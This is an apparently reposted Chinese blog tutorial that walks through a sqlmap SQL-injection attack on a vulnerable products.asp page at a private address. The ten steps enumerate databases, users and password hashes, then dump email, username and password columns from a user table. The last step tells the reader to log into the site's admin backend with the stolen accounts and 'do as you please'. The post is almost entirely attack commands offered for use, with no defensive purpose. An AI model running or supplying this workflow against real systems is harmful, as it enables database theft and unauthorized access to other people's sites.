ohdays

sqlmap注入基本步骤

c0sMx's Blog-关注网络安全!:

一、检测注入点是否可用

#sqlmap -u "https://192.168.1.150/products.asp?id=134"

参数:

-u:指定注入点url

其中图一有若干询问语句,需要用户输入[Y/N],如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下:

#sqlmap -u "https://192.168.1.150/products.asp?id=134" --batch

二、暴库

#sqlmap -u "https://192.168.1.150/products.asp?id=134" --dbs

参数:

--dbs:dbs前面有两条杠,请看清楚。

三、显示web当前使用的数据库

#sqlmap -u "https://192.168.1.150/products.asp?id=134" --current-db

四、显示web数据库当前账户

#sqlmap -u "https://192.168.1.150/products.asp?id=134" --current-user

五、列出sqlserver所有用户

#sqlmap -u "https://192.168.1.150/products.asp?id=134" --users

六、显示数据库账户与密码(一般是加密的)

#sqlmap -u "https://192.168.1.150/products.asp?id=134" --passwords

七、列出数据库中的表

#sqlmap -u "https://192.168.1.150/products.asp?id=134" -D tourdata --tables

参数:

-D:指定数据库名称

--tables:列出表

八、列出表中字段

#sqlmap -u "https://192.168.1.150/products.asp?id=134" -D tourdata -T userb --columns

参数:

-D:指定数据库名称

-T:指定要列出字段的表

--columns:指定列出字段

九、暴字段内容

#sqlmap -u "https://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --dump

参数:

-C :指定要暴的字段

--dump:将结果导出

如果字段内容太多,需要花费很多时间。可以指定导出特定范围的字段内容,命令如下:

#sqlmap -u "https://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump

参数:

--start:指定开始的行

--stop:指定结束的行

此条命令的含义为:导出数据库tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的数据内容。

十、验证结果

根据上述步骤爆出的账号,登录网站后台,然后就自由发挥了。


评论
热度(1)
回到首页
© ohdays | Powered by LOFTER